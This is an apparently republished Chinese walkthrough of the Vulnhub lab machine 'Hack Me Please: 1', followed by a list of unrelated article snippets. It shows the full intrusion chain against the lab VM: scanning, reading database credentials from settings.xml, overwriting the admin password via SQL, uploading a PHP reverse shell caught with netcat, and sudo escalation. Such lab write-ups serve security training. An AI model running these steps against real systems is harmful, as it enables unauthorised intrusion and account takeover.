看完这篇 教你玩转渗透测试靶机vulnhub——Hack Me Please: 1

news2024/11/16 21:23:34

Vulnhub靶机Hack Me Please: 1渗透测试详解

    • Vulnhub靶机介绍:
    • Vulnhub靶机下载:
    • Vulnhub靶机安装:
    • Vulnhub靶机漏洞详解:
        • ①:信息收集:
        • ②:漏洞利用
        • ③:获取反弹shell:
        • ④:sudo提权:
    • Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个Web的漏洞靶机,老样子需要找到flag即可。

Vulnhub靶机下载:

官方网站:https://download.vulnhub.com/hackmeplease/Hack_Me_Please.rar

Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机

在这里插入图片描述
渗透机:kali IP :192.168.0.106 靶机IP :192.168.0.102

使用命令:nmap -sS -sV -A -n 192.168.0.102

在这里插入图片描述
可以看到开放了803306端口 先使用dirb扫一下 好像没有可以用的信息 继续使用dirbuster 我们可以看到有cssjs目录,里面应该还有东西没有扫描出来,我们换一个字典(默认的第五个)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

可以看到js里面好像有重要文件main.js我们访问看到应该是seeddmsCMS建的网站。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:漏洞利用

我们现在知道了CMS使用kali本地漏洞库看一下,以看到最后一个47022.txt前面写的是远程代码执行漏洞

在这里插入图片描述
①:要登录网站 ②:要添加一个document把木马放进去③:要看我们改的documentid
④:接上它的链接加木马去访问利用 我们才扫描过没发现登录地址,但是在main.js里面看到了路径,我们扫描那个路径看看

在这里插入图片描述
在使用dirb扫到了settings.xml得到了数据库账号和密码:seeddms/seeddms 然后进行登入 登入成功!!

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

use seeddms;
show tables;
select * from users; #查询表
select * from tblUser;
select login,pwd from  tblUsers;##查看表内容
update tblUsers set pwd=md5('123456') where login='admin'; #数据库修改密码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

这里需要MD5解码 但是我这边解出来。
在这里插入图片描述
在这里插入图片描述

③:获取反弹shell:

登入成功以后发现有上传点上传一个shell.php然后添加成功后看id号,然后我们要找上传后的绝对路径在下载的seeddms框架中找到了其数据存放的目录为1048576因此对靶机该目录进行扫描使用dirsearch -u http://192.168.0.102/seeddms51x/data/1048576 -e *

PS:如果是4那么就访问/seeddms51x/data/1048576/4/shell.php 就能弹nc 这个序号是根据你上传了多少增加的,如果上传了两次就是5 可以用工具扫出来 这里我直接告诉大家了 不然到时候可能会卡住 我这边就是卡了好久 才回弹的shell(麻烦给个三联)

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

/usr/share/webshells/php/php-reverse-shell.php #kali自带shell
nc -lvp 1234 #和shell.php一样的端口

在这里插入图片描述
在这里插入图片描述

④:sudo提权:

先查看有哪些用户,发现了一个在mysql中见到的用户,切换saket用户
开启交换终端:python3 -c 'import pty;pty.spawn("/bin/bash")' 直接sudo -l sudo su 提权成功!

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
至此获取到了flag,渗透测试结束。

Vulnhub靶机渗透总结:

①.这里的知识点是知道seeddmsCMS上传后的路径:seeddms51x/data/1048576 找不i到的话就访问不了就不能nc反弹shell
②.还有就是一些基本的渗透测试扫描工具的使用:dirb,dirbuster,dirsearch
③.数据库的基本命令使用会改密码 还有sudo 提权

希望对热爱打靶机的小伙伴有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/339715.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

how https works?https工作原理

简单一句话: https http TLShttps 工作原理:HTTPS (Hypertext Transfer Protocol Secure)是一种带有安全性的通信协议,用于在互联网上传输信息。它通过使用加密来保护数据的隐私和完整性。下面是 HTTPS 的工作原理:初始化安全会…

Camtasia2023最新版电脑视频录屏记录编辑软件

在Mac或Wind上有各种可用的视频记录和编辑软件,其中Camtasia被称为视频记录器和视频编辑器。录屏软件Camtasia2023到底有什么特色功能?本文将帮助您选择理想的选择来开始视频捕获,创建和编辑。Camtasia2023是Mac/win平台上一款使用非常简单的…

【JavaScript】题(牛客网)——熟练使用函数调用,超详细讲解

1 熟练使用函数调用 1.1 题目 执行以下程序,输出结果为 var uname "window"; var object {uname: "object",fun: function () {console.log(this.uname);return function () {console.log(this.uname);};}, };object.fun()();1.2 答案 ob…

ThingsBoard-设备配置

1、概述 从 ThingsBoard 3.2 开始,租户管理员可以使用设备配置文件为多个设备配置通用设置。每个设备在单个时间点都有一个且唯一的配置文件。 有经验的 ThingsBoard 用户会注意到设备类型已被弃用,取而代之的是设备配置文件。更新脚本将根据唯一的设备类型自动创建设备配置…

三、Java面向对象

1 . 方法 方法(method)是程序中最小的执行单元方法就是一些代码的打包 需要的时候可以直接调用方法之间是平级的关系 不能在方法里面定义方法方法不调用就不执行 方法的定义 // 方法的定义 /* [修饰符] 返回值类型 方法名称([参数 1],[参数 2]){语句A;return 返回值; } *///…

VT虚拟化框架编写

文章目录前言VT架构基础VT框架编写步骤一:检测VT是否开启VMM和VMVMON和VMCSVT框架编写步骤二 填充VMONVT框架编写步骤三 进入VTVT框架编写步骤四 初始化VMCSVT框架编写步骤五 初始化VMCS数据区VT框架编写步骤六 处理必要事件前言 学习VT相关的知识,需要…

C++11新特性

文章目录说在前面花括号{}初始化new的列表初始化STL相关容器的列表初始化相关语法格式容器列表初始化的底层原理forward_list和array与类型相关的新特性decltype左值引用和右值引用什么是左值,什么是右值左值和右值的本质区别右值引用如何理解右值引用std::move移动…

【软考系统架构设计师】2022下综合知识历年真题

【软考系统架构设计师】2022下综合知识历年真题 【2022下架构真题第01题:绿色】 01.云计算服务体系结构如下图所示,图中①、②、③分别与SaaS、PaaS、Iaas相对应,图中①、②、③应为( ) A.应用层、基础设施层、平台层 B.应用层、平台层、基础…

Linux驱动开发(一)

linux驱动学习记录 一、背景 在开始学习我的linux驱动之旅之前,先提一下题外话,我是一个c语言应用层开发工作人员,在工作当中往往会和硬件直接进行数据的交互,往往遇到数据不通的情况,常常难以定位,而恰巧…

静态分析工具Cppcheck在Windows上的使用

之前在https://blog.csdn.net/fengbingchun/article/details/8887843 介绍过Cppcheck,那时还是1.x版本,现在已到2.x版本,这里再总结下。 Cppcheck是一个用于C/C代码的静态分析工具,源码地址为https://github.com/danmar/cppcheck …

Python之字符串精讲(上)

前言 字符串是所有编程语言在项目开发过程中涉及最多的一个内容。大部分项目的运行结果,都需要以文本的形式展示给客户,曾经有一位久经沙场的老程序员说过一句话:“开发一个项目,基本上就是在不断的处理字符串”。下面对Python中…

自命为缓存之王的Caffeine(3)

您好,我是湘王,这是我的CSDN博客,欢迎您来,欢迎您再来~缓存的存储空间是远远小于磁盘的。所以对于有些过期的数据,就需要定期进行清理,腾出存储空间。Caffeine又是怎么做的呢?Caffei…

SpringBoot+Vue在线小说系统

简介:本项目采用了基本的springbootvue设计的在线小说系统。详情请看截图。经测试,本项目正常运行。本项目适用于Java毕业设计、课程设计学习参考等用途。 特别说明:本系统设计网络爬虫,遵循爬虫规则,此项目用于学习&a…

2023关键词:挑战

未失踪人口回归… 好久不见,不经意间拖更2个多月。今天周末,外面淅淅沥沥下着小雨,这种窝在床上的时刻最适合写点东西了。 但是建议大家在办公或者写博客的时候尽量还是端正坐姿,我就是因为喜欢这样靠在床背上,长时间…

Spring Security 从入门到精通

前言 Spring Security 是 Spring 家族中的一个安全管理框架。相比与另外一个安全框架Shiro,它提供了更丰富的功能,社区资源也比Shiro丰富。 一般来说中大型的项目都是使用SpringSecurity 来做安全框架。小项目有Shiro的比较多,因为相比与Spr…

Vue3+ElementPlus+koa2实现本地图片的上传

一、示例图二、实现过程利用Koa2书写提交图片的后台接口这个模块是我写的项目中的其中一个板块——上传图片,这个项目的后台接口主要是是使用了后端的Koa2框架,前端小伙伴想要试着自己书写一些增删改查的接口可以从这个入手,Koa2用来了解后端…

力扣HOT100 11-15

11.盛水最多的容器 思路:最大水量 底边 * 高度。较短的一边控制最大水量,因此,采用双指针的方式,左、右指针指向开始和末尾,逐个向中间移动,判断左右指针所指向的高度哪个更低,它就向中间移动一…

ubuntu中解决Failed to connect to 127.0.0.1 port xxxxx: Connection refused

ubuntu中解决Failed to connect to 127.0.0.1 port xxxxx: Connection refused 方法一 查看一下代理 git config --global http.proxy git config --global https.proxy 有就取消,没有就换一种方法 git config --global --unset http.proxy git config --global --unse…

计算机网络之http03:HTTPS RSA握手解析

不同的秘钥交换算法,握手过程可能略有差别 上文对HTTPS四次握手的学习 SSL/TLS Secure Sockets Layer/Transport Layer Security 协议握手过程 四次通信:请求服务端公钥 2次 秘钥协商 2次 (1)ClientHello请求 客户端向服务端发送client…

状态机设计举例

⭐本专栏针对FPGA进行入门学习,从数电中常见的逻辑代数讲起,结合Verilog HDL语言学习与仿真,主要对组合逻辑电路与时序逻辑电路进行分析与设计,对状态机FSM进行剖析与建模。 🔥文章和代码已归档至【Github仓库&#xf…